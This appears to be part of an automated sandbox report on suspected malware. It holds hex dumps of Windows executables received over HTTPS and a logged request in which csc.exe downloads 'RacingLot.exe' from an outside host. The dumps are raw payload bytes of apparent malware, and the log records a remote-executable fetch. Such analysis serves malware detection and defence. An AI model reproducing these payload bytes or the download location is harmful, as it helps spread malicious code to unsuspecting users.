                                                                                                    2024-11-19 14:57:25 UTC7969INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fc 29 b7 a4 b8 48 d9 f7 b8 48 d9 f7 b8 48 d9 f7 0c d4 28 f7 ab 48 d9 f7 0c d4 2a f7 13 48 d9 f7 0c d4 2b f7 a6 48 d9 f7 b1 30 5d f7 b9 48 d9 f7 26 e8 1e f7 ba 48 d9 f7 ea 20 dc f6 86 48 d9 f7 ea 20 dd f6 99 48 d9 f7 ea 20 da f6 a2 48 d9 f7 b1 30 4a f7 a1 48 d9 f7 b8 48 d8 f7 f9 49 d9 f7 13 21 d0 f6 db 48 d9 f7 13 21 26 f7 b9 48 d9 f7 13 21 db f6 b9 48 d9 f7 52 69 63 68 b8 48 d9
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$)HHH(H*H+H0]H&H H H H0JHHI!H!&H!HRichH
                                                                                                    2024-11-19 14:57:25 UTC8000INData Raw: 51 8b c8 e8 f1 fa ff ff 89 44 24 20 89 7b 10 89 73 14 ff 74 24 20 e8 92 ea ff ff 83 7c 24 14 10 8b f8 59 ff 74 24 2c ff 74 24 2c ff 74 24 1c 72 28 8b 33 56 e8 74 ea ff ff 59 50 57 e8 61 f9 ff ff 8b 44 24 10 8b 4c 24 18 40 50 56 e8 bc fa ff ff 8b 44 24 20 89 03 eb 20 53 57 e8 42 f9 ff ff 8d 44 24 20 50 53 e8 42 ea ff ff 59 50 ff 74 24 20 e8 15 00 00 00 83 c4 0c 5f 5e 8b c5 5d 5b 83 c4 0c c2 10 00 e8 9f 00 00 00 cc 56 ff 74 24 10 e8 18 ea ff ff ff 74 24 10 8b f0 6a 04 e8 9d e9 ff ff 8b 0e 83 c4 0c 89 08 5e c3 8b 44 24 04 3d 00 10 00 00 72 08 50 e8 38 07 00 00 59 c3 85 c0 74 08 50 e8 ea e9 ff ff 59 c3 33 c0 c3 55 8b ec 8b 45 0c 3d 00 10 00 00 72 12 8d 45 0c 50 8d 45 08 50 e8 d0 e9 ff ff 8b 45 0c 59 59 50 ff 75 08 e8 a4 0c 03 00 59 59 5d c3 55 8b ec 51 c6 45
                                                                                                    Data Ascii: QD$ {st$ |$Yt$,t$,t$r(3VtYPWaD$L$@PVD$ SWBD$ PSBYPt$ _^][Vt$t$j^D$=rP8YtPY3UE=rEPEPEYYPuYY]UQE
                                                                                                    2024-11-19 14:57:25 UTC8000INData Raw: 62 01 00 50 8b d5 8b ce e8 30 02 00 00 83 ec 14 8b cc 68 54 54 46 00 e8 e9 d4 ff ff e8 04 5c 01 00 83 c4 30 8d 4c 24 20 e8 5c d4 ff ff 83 25 20 46 47 00 00 b0 01 c6 05 25 46 47 00 01 89 3d 1c 46 47 00 eb 02 32 c0 5f 5e 5d 83 c4 2c c2 04 00 56 8b f1 80 7e 5c 00 74 5d 80 7c 24 08 00 75 26 83 ec 18 8b cc 68 ec 54 46 00 e8 96 d4 ff ff 83 ec 18 8b cc 68 10 55 46 00 e8 87 d4 ff ff e8 a2 5b 01 00 83 c4 30 33 c0 50 50 50 50 ff 15 d8 72 45 00 ff 76 60 89 46 64 ff 15 e4 72 45 00 6a ff ff 76 64 ff 15 ec 72 45 00 ff 76 64 ff 15 f8 72 45 00 b0 01 eb 02 32 c0 5e c2 04 00 8b 4c 24 04 e8 03 00 00 00 c2 04 00 51 53 56 8b f1 33 db 89 5e 78 39 5e 74 76 1e 68 e8 03 00 00 ff 76 60 ff 15 ec 72 45 00 8b 4e 78 41 89 4e 78 85 c0 74 44 3b 4e 74 72 e2 88 5e 5c 38 1d 8a 1d 47 00 74
                                                                                                    Data Ascii: bP0hTTF\0L$ \% FG%FG=FG2_^],V~\t]|$u&hTFhUF[03PPPPrEv`FdrEjvdrEvdrE2^L$QSV3^x9^tvhv`rENxANxtD;Ntr^\8Gt
                                                                                                    2024-11-19 14:57:25 UTC8000INData Raw: 46 00 b9 f8 42 47 00 e8 e2 b4 ff ff 8b d0 e8 4e bf 00 00 59 0f b6 c0 59 c3 55 8b ec 83 ec 58 56 57 6a 44 5e 56 33 ff 8d 45 a8 57 50 e8 7e f6 02 00 6a 10 8d 45 f0 89 75 a8 57 50 e8 6f f6 02 00 83 c4 18 8d 45 f0 50 8d 45 a8 50 57 57 68 00 00 00 08 57 57 57 68 10 59 46 00 68 94 59 46 00 ff 15 bc 72 45 00 ff 75 f0 8b 35 f8 72 45 00 ff d6 ff 75 f4 ff d6 5f 5e c9 c3 e8 07 00 00 00 f6 d8 1a c0 fe c0 c3 52 e8 01 00 00 00 c3 56 e8 b4 b6 ff ff ff 74 24 08 8b f0 e8 61 c8 ff ff 59 50 ff 74 24 0c 8b ce e8 82 b6 ff ff 8b 56 10 8b c8 e8 06 00 00 00 59 59 5e c2 04 00 3b 54 24 08 75 12 52 8b 54 24 08 e8 0b 00 00 00 59 85 c0 75 03 b0 01 c3 32 c0 c3 ff 74 24 04 52 51 e8 11 fa ff ff 83 c4 0c c3 8b 4c 24 0c 85 c9 74 1d 8b 44 24 08 0f b7 d0 8b c2 c1 e2 10 57 8b 7c 24 08 0b c2
                                                                                                    Data Ascii: FBGNYYUXVWjD^V3EWP~jEuWPoEPEPWWhWWWhYFhYFrEu5rEu_^RVt$aYPt$VYY^;T$uRT$Yu2t$RQL$tD$W|$
                                                                                                    2024-11-19 14:57:25 UTC8000INData Raw: 00 00 00 8b 43 14 8b cd 57 8d 7e 01 89 44 24 14 57 e8 2e a5 ff ff 8b cd 8b f0 e8 e7 97 ff ff 8d 4e 01 89 44 24 1c 51 8b c8 e8 0b 9d ff ff 89 44 24 10 89 7b 10 89 73 14 ff 74 24 10 e8 ac 8c ff ff 83 7c 24 18 10 8b f8 59 ff 74 24 2c ff 74 24 1c 72 28 8b 33 56 e8 92 8c ff ff 59 50 57 e8 33 ff ff ff 8b 44 24 14 8b 4c 24 1c 40 50 56 e8 da 9c ff ff 8b 44 24 10 89 03 eb 20 53 57 e8 14 ff ff ff 8d 44 24 10 50 53 e8 60 8c ff ff 59 50 ff 74 24 24 e8 33 a2 ff ff 83 c4 0c 5f 5e 8b c5 5d 5b 83 c4 10 c2 0c 00 e8 bd a2 ff ff cc 8b 44 24 04 85 c0 74 0d 66 39 11 74 0b 83 c1 02 83 e8 01 75 f3 33 c0 c3 8b c1 c3 b8 95 6b 45 00 e8 2d de 04 00 81 ec 00 03 00 00 53 56 57 89 65 f0 8b d9 89 5d e4 8d 8d 64 ff ff ff e8 db 95 ff ff 83 4d e8 ff c6 03 00 83 65 fc 00 83 c3 04 8b cb e8
                                                                                                    Data Ascii: CW~D$W.ND$QD${st$|$Yt$,t$r(3VYPW3D$L$@PVD$ SWD$PS`YPt$$3_^][D$tf9tu3kE-SVWe]dMe
                                                                                                    2024-11-19 14:57:25 UTC8000INData Raw: 8b ce e8 4e 00 00 00 8d 4d e8 e8 ba 76 ff ff 83 ec 18 8b cc 57 e8 2b 77 ff ff 83 ec 18 8b cc 68 54 54 46 00 e8 1c 77 ff ff e8 37 fe 00 00 83 c4 30 c6 46 49 00 80 7e 4a 00 75 10 83 3e 00 74 0b ff 36 ff 15 90 73 45 00 83 26 00 b0 01 eb 02 32 c0 5f 5e c9 c3 55 8b ec 83 ec 40 56 57 8d 45 f0 8b f9 50 ff 15 dc 72 45 00 8d 45 08 ba 18 5c 46 00 68 84 5b 46 00 50 8d 4d c0 e8 3d 08 00 00 59 8b d0 8d 4d d8 e8 24 80 ff ff 59 50 8d 4d 08 e8 63 75 ff ff 8d 4d d8 e8 56 75 ff ff 8d 4d c0 e8 4e 75 ff ff 8d 4d 08 e8 2b 7a ff ff 8d 04 45 64 00 00 00 50 e8 b2 ff 02 00 59 0f b7 4d fc 8b f0 0f b7 45 f0 51 0f b7 4d fa 51 0f b7 4d f8 51 0f b7 4d f6 51 0f b7 4d f2 51 50 8d 4d 08 e8 04 75 ff ff 50 56 ff 15 88 73 45 00 59 59 8b cc 56 e8 2b 92 ff ff 8b cf e8 3c f4 ff ff 56 e8 65 ff
                                                                                                    Data Ascii: NMvW+whTTFw70FI~Ju>t6sE&2_^U@VWEPrEE\Fh[FPM=YM$YPMcuMVuMNuM+zEdPYMEQMQMQMQMQPMuPVsEYYV+<Ve
                                                                                                    2024-11-19 14:57:25 UTC8000INData Raw: 85 38 fd ff ff 50 68 b0 63 46 00 8d 8d 58 ff ff ff e8 c9 73 ff ff 8b d0 8d 8d 70 ff ff ff e8 4b 61 ff ff 59 8b d0 8d 4d d0 e8 d1 60 ff ff 59 8b d0 8d 4d b8 e8 35 61 ff ff 59 50 8d 4d e8 e8 3f 66 ff ff 8d 4d b8 e8 67 56 ff ff 8d 4d d0 e8 5f 56 ff ff 8d 8d 70 ff ff ff e8 54 56 ff ff 8d 8d 58 ff ff ff e8 49 56 ff ff 8d 8d 40 ff ff ff e8 3e 56 ff ff 68 10 64 46 00 8d 4d e8 e8 f0 ba ff ff 57 8d 4d a0 e8 1c 56 ff ff 50 8d 4d e8 e8 04 5b ff ff 8b f0 8d 4d e8 03 f6 e8 07 56 ff ff 8b d6 8b c8 e8 86 ed 00 00 59 59 84 c0 74 29 57 b8 00 59 46 00 8d 4d a0 50 50 e8 e8 55 ff ff 50 68 9c 55 46 00 57 ff 15 5c 73 45 00 83 f8 20 7e 07 57 ff 15 ac 72 45 00 8d 4d e8 e8 d3 55 ff ff 8d 4d a0 e8 cb 55 ff ff 8d 4d 88 e8 c3 55 ff ff 5f 5e c9 c3 55 8b ec 83 ec 34 53 56 ff 75 08 8b
                                                                                                    Data Ascii: 8PhcFXspKaYM`YM5aYPM?fMgVM_VpTVXIV@>VhdFMWMVPM[MVYYt)WYFMPPUPhUFW\sE ~WrEMUMUMU_^U4SVu
                                                                                                    2024-11-19 14:57:25 UTC8000INData Raw: c9 c3 81 ec 88 03 00 00 55 56 57 8b f9 e8 f7 38 ff ff e8 a3 ca 00 00 6a 00 6a 02 a2 f5 3a 47 00 ff 15 c4 70 45 00 8b f0 85 f6 0f 84 e0 01 00 00 8d 84 24 60 01 00 00 c7 84 24 60 01 00 00 2c 02 00 00 50 56 ff 15 cc 70 45 00 8d 84 24 60 01 00 00 50 56 ff 15 c8 70 45 00 85 c0 0f 84 a8 01 00 00 bd 50 67 46 00 8d 84 24 84 01 00 00 50 8d 4c 24 14 e8 28 54 ff ff 8b 8c 24 68 01 00 00 68 4c 67 46 00 e8 5e ca 00 00 0f b6 d0 8d 8c 24 4c 01 00 00 e8 0e c6 00 00 8b 94 24 6c 01 00 00 8d 8c 24 34 01 00 00 50 55 e8 f9 c5 00 00 8b 94 24 74 01 00 00 8d 8c 24 24 01 00 00 50 55 e8 1b cc 00 00 8b d0 8d 8c 24 14 01 00 00 e8 58 c7 00 00 50 55 8d 54 24 2c 8d 8c 24 04 01 00 00 e8 46 c7 00 00 50 8b d7 8d 8c 24 f0 00 00 00 e8 34 75 ff ff 59 8b d0 8d 8c 24 d4 00 00 00 e8 46 75 ff ff
                                                                                                    Data Ascii: UVW8jj:GpE$`$`,PVpE$`PVpEPgF$PL$(T$hhLgF^$L$l$4PU$t$$PU$XPUT$,$FP$4uY$Fu
                                                                                                    2024-11-19 14:57:25 UTC8000INData Raw: 57 89 4c 24 10 33 c9 0f b7 78 14 83 c7 24 89 74 24 14 66 3b 48 06 0f 83 a9 00 00 00 03 f8 83 7f 04 00 75 3b 8b 44 24 1c 8b 70 38 85 f6 7e 78 ff 73 34 8b 07 6a 04 68 00 10 00 00 03 c5 56 50 ff 53 1c 83 c4 14 85 c0 0f 84 82 00 00 00 8b 07 56 03 c5 6a 00 50 89 47 fc e8 12 5a 02 00 eb 45 8b 57 08 8b ce 03 57 04 e8 6c ff ff ff 85 c0 74 5f ff 73 34 8b 07 6a 04 68 00 10 00 00 ff 77 04 03 c5 50 ff 53 1c 83 c4 14 85 c0 74 43 ff 77 04 8b 47 08 8b 37 03 44 24 14 03 f5 50 56 e8 4e 54 02 00 89 77 fc 83 c4 0c 8b 03 83 c7 28 8b 74 24 20 46 89 74 24 20 0f b7 40 06 3b f0 8b 74 24 14 0f 8c 59 ff ff ff 33 c0 40 5f 5e 5d 5b 59 59 c3 33 c0 eb f5 8b 42 10 85 c0 75 17 f6 42 24 40 74 06 8b 01 8b 40 20 c3 f6 42 24 80 74 05 8b 01 8b 40 24 c3 51 56 8b 72 08 57 85 f6 74 3e 8b 7a 0c
                                                                                                    Data Ascii: WL$3x$t$f;Hu;D$p8~xs4jhVPSVjPGZEWWlt_s4jhwPStCwG7D$PVNTw(t$ Ft$ @;t$Y3@_^][YY3BuB$@t@ B$t@$QVrWt>z
                                                                                                    2024-11-19 14:57:25 UTC8000INData Raw: c7 45 f8 00 04 00 00 50 68 19 00 02 00 33 f6 8b f9 56 ff 75 08 52 ff 15 6c 70 45 00 85 c0 75 31 8d 45 f8 50 8d 85 f8 fb ff ff 50 56 56 ff 75 0c ff 75 fc ff 15 58 70 45 00 ff 75 fc 8b f0 ff 15 50 70 45 00 85 f6 75 09 8d 85 f8 fb ff ff 50 eb 05 68 54 55 46 00 8b cf e8 e8 f9 fe ff 8b c7 5f 5e c9 c3 55 8b ec 81 ec 08 08 00 00 56 8d 45 fc c7 45 f8 00 04 00 00 50 68 19 00 02 00 6a 00 ff 75 08 8b f1 52 ff 15 70 70 45 00 85 c0 75 2d 8d 45 f8 50 8d 85 f8 f7 ff ff 50 6a 00 6a 00 ff 75 0c ff 75 fc ff 15 80 70 45 00 ff 75 fc ff 15 50 70 45 00 8d 85 f8 f7 ff ff 50 eb 05 68 00 59 46 00 8b ce e8 57 15 ff ff 8b c6 5e c9 c3 55 8b ec 51 51 53 56 57 8d 45 fc 8b f9 50 33 c9 8d 45 f8 51 50 51 ff 75 08 8b da 89 4d fc 53 be 54 55 46 00 ff 15 80 70 45 00 85 c0 75 32 39 45 fc 76
                                                                                                    Data Ascii: EPh3VuRlpEu1EPPVVuuXpEuPpEuPhTUF_^UVEEPhjuRppEu-EPPjjuupEuPpEPhYFW^UQQSVWEP3EQPQuMSTUFpEu29Ev


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.54977374.220.219.134436848C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-11-19 14:57:28 UTC74OUTGET /RacingLot.exe HTTP/1.1
                                                                                                    Host: bhcc.com.sa
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-11-19 14:57:28 UTC286INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 19 Nov 2024 14:57:28 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade
                                                                                                    Last-Modified: Mon, 18 Nov 2024 16:01:47 GMT
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 1218642
                                                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                    Content-Type: application/x-msdownload
                                                                                                    2024-11-19 14:57:28 UTC7906INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 f8 06 00 00 42 00 00 83 38 00 00 00 10 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOnB8
                                                                                                    2024-11-19 14:57:28 UTC8000INData Raw: 66 39 1e 0f 84 f8 05 00 00 56 e8 79 34 00 00 50 ff 15 bc 80 40 00 e9 e6 05 00 00 6a ed e8 58 e9 ff ff ff 75 dc ff 75 d8 50 e8 40 33 00 00 83 f8 ff 0f 85 c3 05 00 00 33 c0 66 89 06 e9 f0 ee ff ff bf 04 20 00 00 57 6a 40 ff 15 24 81 40 00 89 45 08 39 5d dc 74 12 33 c9 41 e8 05 e9 ff ff 8b 4d 08 88 01 33 c0 40 eb 25 6a 11 e8 0a e9 ff ff 53 53 57 ff 75 08 6a ff 68 d0 f0 40 00 53 53 ff 15 48 81 40 00 ff 75 08 ff 15 4c 81 40 00 66 39 1e 74 1e 53 8d 4d bc 51 50 ff 75 08 56 e8 e6 33 00 00 50 ff 15 54 81 40 00 85 c0 0f 85 f1 f7 ff ff c7 45 fc 01 00 00 00 e9 e5 f7 ff ff 6a 02 59 e8 9f e8 ff ff 89 45 f8 83 f8 01 0f 8c 30 05 00 00 b9 03 20 00 00 3b c1 7e 03 89 4d f8 66 39 1e 0f 84 b3 00 00 00 56 88 5d c7 e8 99 33 00 00 89 45 bc 39 5d f8 0f 8e 9e 00 00 00 8b f3 53 8d
                                                                                                    Data Ascii: f9Vy4P@jXuuP@33f Wj@$@E9]t3AM3@%jSSWujh@SSH@uL@f9tSMQPuV3PT@EjYE0 ;~Mf9V]3E9]S
                                                                                                    2024-11-19 14:57:28 UTC8000INData Raw: 53 6a 06 6a 21 57 57 a3 00 72 43 00 ff 15 34 80 40 00 68 ff 00 ff 00 ff 75 f0 a3 10 72 43 00 50 ff 15 28 80 40 00 ff 35 10 72 43 00 6a 02 68 09 11 00 00 ff 75 fc ff d6 53 53 68 1c 11 00 00 ff 75 fc ff d6 3b c7 7d 0c 53 57 68 1b 11 00 00 ff 75 fc ff d6 ff 75 f0 ff 15 44 80 40 00 33 ff 8b 45 e4 8b 04 b8 3b c3 74 27 83 ff 20 74 03 89 5d ec 50 53 e8 6b 1d 00 00 50 53 68 43 01 00 00 ff 75 f8 ff d6 57 50 68 51 01 00 00 ff 75 f8 ff d6 47 83 ff 21 7c c9 8b 45 ec 8b 7d 14 ff 74 87 30 6a 15 ff 75 08 e8 73 f2 ff ff 8b 45 ec ff 74 87 34 6a 16 ff 75 08 e8 62 f2 ff ff 33 ff 89 5d f4 39 1d ec 2d 47 00 0f 8e bc 00 00 00 8b 45 e8 83 c0 08 89 45 f0 bb 32 11 00 00 8b 55 f0 8d 42 10 66 83 38 00 0f 84 84 00 00 00 8b 4d f4 89 45 c0 8b 02 6a 20 89 4d a8 59 8b d0 23 d1 c7 45 ac
                                                                                                    Data Ascii: Sjj!WWrC4@hurCP(@5rCjhuSShu;}SWhuuD@3E;t' t]PSkPShCuWPhQuG!|E}t0jusEt4jub3]9-GEE2UBf8MEj MY#E
                                                                                                    2024-11-19 14:57:28 UTC8000INData Raw: 24 75 6a 68 04 20 00 00 57 ff 15 a8 80 40 00 33 f6 eb 5a a1 d0 2d 47 00 33 c9 4e 3b c1 74 18 39 4d 0c 74 13 57 51 51 ff 74 b5 e8 ff 35 d4 2d 47 00 ff d0 85 c0 74 3a 8d 45 fc 50 ff 74 b5 e8 ff 35 d4 2d 47 00 ff 15 90 81 40 00 85 c0 75 19 57 ff 75 fc ff 15 80 81 40 00 ff 75 fc 8b d8 ff 15 bc 82 40 00 85 db 75 09 33 c0 66 89 07 85 f6 75 a2 66 83 3f 00 74 4e 83 7d f4 1a 75 48 68 08 96 40 00 57 ff 15 e8 80 40 00 eb 3a b8 01 e0 00 00 66 39 45 0c 75 37 83 fe 1d 75 0e ff 35 d4 2d 47 00 57 e8 48 f5 ff ff eb 14 8b c6 69 c0 08 40 00 00 05 00 30 47 00 50 57 e8 ea f5 ff ff 83 c6 eb 83 fe 07 73 1f 57 e8 0b f6 ff ff eb 17 b8 03 e0 00 00 66 39 45 0c 75 0c 83 c8 ff 2b c6 50 57 e8 bf fd ff ff 57 ff 15 74 81 40 00 8b 4d f8 8d 3c 47 b8 40 25 46 00 eb 19 66 3b d6 75 0e 66 8b
                                                                                                    Data Ascii: $ujh W@3Z-G3N;t9MtWQQt5-Gt:EPt5-G@uWu@u@u3fuf?tN}uHh@W@:f9Eu7u5-GWHi@0GPWsWf9Eu+PWWt@M<G@%Ff;uf
                                                                                                    2024-11-19 14:57:28 UTC8000INData Raw: 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20 00 75 00 73 00 65 00 72 00 20 00 63 00 61 00 6e 00 63 00 65 00 6c 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 73 00 6b 00 69 00 70 00 70 00 65 00 64 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 66 00 6c 00 61 00 67 00 3d 00 25 00 64 00 29 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20 00 75 00 73 00 65 00 72 00 20 00 61 00 62 00 6f 00 72 00 74 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20 00 75 00 73 00 65 00 72 00 20 00 72 00 65 00 74 00 72 00 79 00 00 00 46
                                                                                                    Data Ascii: %d to "%s"File: error, user cancelFile: skipped: "%s" (overwriteflag=%d)File: error, user abortFile: error, user retryF
                                                                                                    2024-11-19 14:57:28 UTC8000INData Raw: 74 69 61 6c 69 7a 65 00 32 01 4f 6c 65 49 6e 69 74 69 61 6c 69 7a 65 00 68 00 43 6f 54 61 73 6b 4d 65 6d 46 72 65 65 00 6f 6c 65 33 32 2e 64 6c 6c 00 0e 00 56 65 72 51 75 65 72 79 56 61 6c 75 65 57 00 00 06 00 47 65 74 46 69 6c 65 56 65 72 73 69 6f 6e 49 6e 66 6f 57 00 05 00 47 65 74 46 69 6c 65 56 65 72 73 69 6f 6e 49 6e 66 6f 53 69 7a 65 57 00 56 45 52 53 49 4f 4e 2e 64 6c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii: tialize2OleInitializehCoTaskMemFreeole32.dllVerQueryValueWGetFileVersionInfoWGetFileVersionInfoSizeWVERSION.dll
                                                                                                    2024-11-19 14:57:28 UTC8000INData Raw: e1 ff 40 6e e1 ff 36 70 e2 ff 2d 75 e5 ff 28 7d e8 ff 29 8a eb ff 34 9c ef ff 37 aa f3 ff 46 c2 ff ff 50 b2 d9 ff a7 9d 97 ff a0 9e 9c ff 24 23 23 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 14 00 00 00 28 00 00 00 35 00 00 00 30 20 20 20 60 ab aa aa ff 82 80 80 ff 38 37 37 ff 1b 1b 1b ff 7b 7a 7b ff c1 c0 c1 ff a3 a1 a3 ff 8b 8b 8b ff 6d 6d 6d ff 47 47 47 ff 31 31 31 ff 36 36 36 ff 37 37 37 ff 39 39 39 ff 3a 3a 3a ff 3c 3c 3c ff 3a 3a 31 ff 53 56 9a ff 67 6e ea ff 65 6e df ff 66 73 e0 ff 68 7a e2 ff 6b 82 e4 ff 6d 89 e6 ff 6c 8f e8 ff 68 93 ea ff 62 97 eb ff 5c 9c ed ff 56 a3 ef ff 58 ae f3 ff 61 bc f6 ff 6f d2 ff ff 69 b7 d6 ff 7a 71 6e ff 94 92 90 ff 1e 1e 1d 35 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii: @n6p-u(})47FP$##>(50 `877{z{mmmGGG111666777999:::<<<::1SVgnenfshzkmlhb\VXaoizqn5
                                                                                                    2024-11-19 14:57:28 UTC8000INData Raw: 49 38 54 38 5a 38 5f 38 83 38 8a 38 96 38 a9 38 af 38 be 38 c8 38 ce 38 e0 38 e6 38 ec 38 f2 38 f9 38 ff 38 07 39 12 39 18 39 34 39 4d 39 5f 39 66 39 6e 39 73 39 80 39 8c 39 95 39 9a 39 aa 39 b9 39 c1 39 c7 39 cd 39 ee 39 f7 39 0e 3a 20 3a 3e 3a 45 3a 50 3a 88 3a 91 3a 9e 3a b3 3a b9 3a be 3a c7 3a d3 3a dd 3a e7 3a ec 3a f7 3a fb 3a 01 3b 06 3b 0c 3b 24 3b 33 3b 5d 3b 62 3b 7f 3b 8d 3b 93 3b 99 3b 9e 3b a9 3b b1 3b b7 3b c5 3b cf 3b d5 3b da 3b e0 3b ee 3b f4 3b 18 3c 4a 3c 5b 3c 66 3c 73 3c 80 3c 93 3c 99 3c ae 3c be 3c cc 3c d1 3c d6 3c db 3c e4 3c e9 3c ef 3c f3 3c f9 3c ff 3c 16 3d 5d 3d c2 3d e0 3d f1 3d 36 3e 49 3e 56 3e 78 3e 8d 3e 95 3e 9f 3e ba 3e ff 3e 21 3f 48 3f 56 3f 60 3f 00 00 00 60 00 00 6c 01 00 00 18 30 21 30 27 30 33 30 7f 30 8b 30 c5
                                                                                                    Data Ascii: I8T8Z8_88888888888888899949M9_9f9n9s999999999999: :>:E:P::::::::::::::;;;$;3;];b;;;;;;;;;;;;;;;;<J<[<f<s<<<<<<<<<<<<<<<<=]====6>I>V>x>>>>>>!?H?V?`?`l0!0'03000
                                                                                                    2024-11-19 14:57:28 UTC8000INData Raw: b2 d8 c3 b9 02 f1 7b 3e 00 89 8a 30 fd 53 26 ba 99 7c 62 dd b3 e9 47 43 4b 6d f6 c6 c4 75 43 3a bc cf e1 3d f7 1a a7 74 db c2 a7 b6 46 14 fa 0f 8a 60 e0 18 f9 14 37 0b 3d 76 c2 0e f1 e2 f0 0b 6f 82 d9 27 5e ea 53 c1 69 45 6b 75 2f 53 19 ad f5 49 0d c8 65 a9 dd 22 fa 9b 7d c3 0e 6b 08 74 d3 58 f0 64 9f 85 e1 91 c0 6c 73 cc 53 f9 d9 80 32 c6 80 33 c9 ba bf 7c ac 29 89 17 81 5f 8a ab 34 e9 32 6b 14 73 d9 cc d0 e4 80 2f 61 54 cc 97 32 ab bc 79 77 39 d7 55 6a 2a fd 24 be a9 19 70 91 60 df 47 1e c8 73 66 ac 86 43 3f 73 6d 6c ae 7f 34 33 a3 db b6 06 7c b9 d8 f7 90 b7 14 9b f5 0a 1c 6e ed 50 7d 01 98 bd 89 22 53 bf 5c f8 bf 34 da df d2 7d 9a 97 fd 6b 11 d2 56 e0 58 68 8d d5 42 bf c8 e8 33 39 3e 02 bd e7 e3 2c ca 2b 2e e2 d7 58 db d5 ae f8 29 c3 46 19 81 a6 67 9f
                                                                                                    Data Ascii: {>0S&|bGCKmuC:=tF`7=vo'^SiEku/SIe"}ktXdlsS23|)_42ks/aT2yw9Uj*$p`GsfC?sml43|nP}"S\4}kVXhB39>,+.X)Fg
                                                                                                    2024-11-19 14:57:28 UTC8000INData Raw: e8 4b 61 c4 f4 d1 e0 d5 54 83 2b 75 65 3d b6 8a 54 4e cf d1 2e 12 77 1e 60 9d 53 13 27 ab 64 16 70 71 99 7d 4d 75 e3 78 cc 3a a0 61 11 59 62 fb e4 93 9b 48 04 ab ac dc 54 9f 6c fe 9b c5 27 51 1d 56 fc 30 2f a1 04 ac 4b d3 6a 8a 3a f4 77 ed 0e 83 df 3c 50 ff dc b0 a2 d7 7c 0f 2e d9 ef d5 1f cd a9 0e 27 cb 12 a7 2f 7d 6c 00 46 13 c5 53 13 6d 4b 32 cb 7a 0d 05 1a 38 d7 90 b4 f5 be 4d 6c 03 79 c7 7d 70 66 52 ae f9 66 1b e5 c2 ed e0 f3 b4 f2 88 c4 5e cb fc c6 a1 e0 a5 96 19 a2 e1 a1 8a 0f 70 4f 3c 3a f0 94 e2 2d 98 8d fb 21 71 a0 9e 21 55 cf 04 06 09 36 f6 da ac f7 0d 48 69 9d 61 7b ce b8 a8 43 77 1a 75 a1 fa 5a 02 79 a8 b7 48 ca 10 4f 3c f1 6f 04 ed a5 71 2a 58 b8 e1 72 5b 9c 2d 92 12 02 40 95 25 82 f2 29 8f b2 f6 27 b6 a5 67 84 f5 e9 3e 94 d2 45 5c bf 4c 48
